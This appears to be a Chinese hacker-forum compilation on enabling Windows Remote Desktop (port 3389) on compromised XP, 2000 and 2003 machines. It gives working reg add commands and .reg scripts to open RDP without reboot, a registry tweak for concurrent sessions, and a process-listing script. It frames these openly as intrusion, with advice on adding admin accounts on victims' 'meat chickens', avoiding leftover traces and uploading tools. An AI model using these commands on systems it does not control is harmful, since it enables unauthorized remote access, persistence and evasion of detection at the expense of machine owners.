开启3389系列

开3389

CMD下开3389终端

命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

-------------------------------------------------------------------------------------------------------------

关于3389的一些很少人知道的东西

本机设置远程桌面连接就不多说了，不过要注意的是第一点在本机WinXP系统中，右键单击“我的电脑”，选择“属性”，在弹出对话框中点击“远程”选项卡，勾选“允许用户远程连接到这台计算机”项。注意！如果这项没有勾上，即使别人入侵了你的机器上传 3389工具打开了你的端口也一样是连接不上你的计算机的。我第一次使用远程桌面连接时就在这里卡了好久。默认设置是选中的。



第二点，与原先WINNT的终端服务不同，Windows XP不支持多个用户同时登录。也就是说，当其他用户远程登录你的Windows XP时，那么主机上当前正在操作的用户将自动退出，而屏幕也将黑屏。当你再次登录系统后，那么很不幸，远程用户的连接又将被中断，如果对方是拨号的ADSL，你就等着窝火吧，因为在他再次登陆的时候，需要重新拨号登陆网络，这个时候对方的IP已经换了。(需要说明的是，在Windows 2003中，允许多用户同时以本地或远程桌面连接方式登录主机)还有在微软Windows XP SP2新闻讨论组的电脑玩家们那里又流传着一个消息：那就是在安装了SP2 beta后，用户只需要在注册表编辑器中展开 HKEY_LOCAL_MARCHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core 分支，新建一个名为“EnableConcurrentSessions”的DWORD值，将键值设置为“1”，就可以让Windows XP支持两个用户。使用此法实现多用户登录时最多只允许两个用户同时登录，并且登录的必须为不同的账号。



第三点，也是很多人会忽略了的地方，如果你入侵了对方的系统并建立了一个管理员帐户，通过这个新建的帐户登陆 3389后，会在对方的%systemroot%\Documents and Settings\下生成一个和你用来登陆 3389的用户名相同名称的文件夹。里面记录着你的很多东东，各位使用肉鸡的同志注意了，说不定哪一天被人抓到就不好玩咯。同样，很多人在登陆了 3389后退出都是直接点X，这样是错误的，正确退出方法是选开始-----断开。


还有，不知道各位在登陆远程桌面后是怎样上传工具的，TFTP？？我的方法是打开QQ，在本地开的QQ上传送过去......此方法适合普通用户，如果是服务器那只好下载提前放在网络空间里的东东了。说到这里可能有人会丢砖头------你丫的不如说说你之前是怎么样上传工具开了对方的 3389..........这个..........方法其实很多啦......留给大家慢慢摸索了。

另外:用WinConnect Server，可以让我们突破限制，多用户登录Windows XP的远程桌面

-----------------------------------------------------------------------------------------------------------

各种系统入侵开启3389的方法的介绍

1.windowsXP,2003下开启3389的方法

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
"PortNumber"=dword:00000D3D 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
"PortNumber"=dword:00000D3D 

2.windows2000下开启3389的方法

Windows Registry Editor Version 5.00 >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg 
"Enabled"="0" >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg 
"ShutdownWithoutLogon"="0" >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg 
"EnableAdminTSRemote"=dword:00000001 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg 
"TSEnabled"=dword:00000001 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg 
"Start"=dword:00000002 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg 
"Start"=dword:00000002 >>3389.reg 
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg 
"Hotkey"="1" >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
"PortNumber"=dword:00000D3D >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg 
"PortNumber"=dword:00000D3D >>3389.reg 

netd.exe

pid:

wscript.echo "PID   ProcessName" 
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_  
wscript.echo ps.handle^&vbtab^&ps.name
next

-------------------------------------------------------------------------------------------------------------

2003/XP不重启命令行开3389

2010-08-27 13:42

2003/XP开3389其实非常简单，通常情况下一行命令就ok了(下面的第一行)，为了保险起见可以把下面三行都运行(后面两行是改端口用的,但真正渗透中不建议改人家的端口,查出端口用就是了): reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f 查询3389端口: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"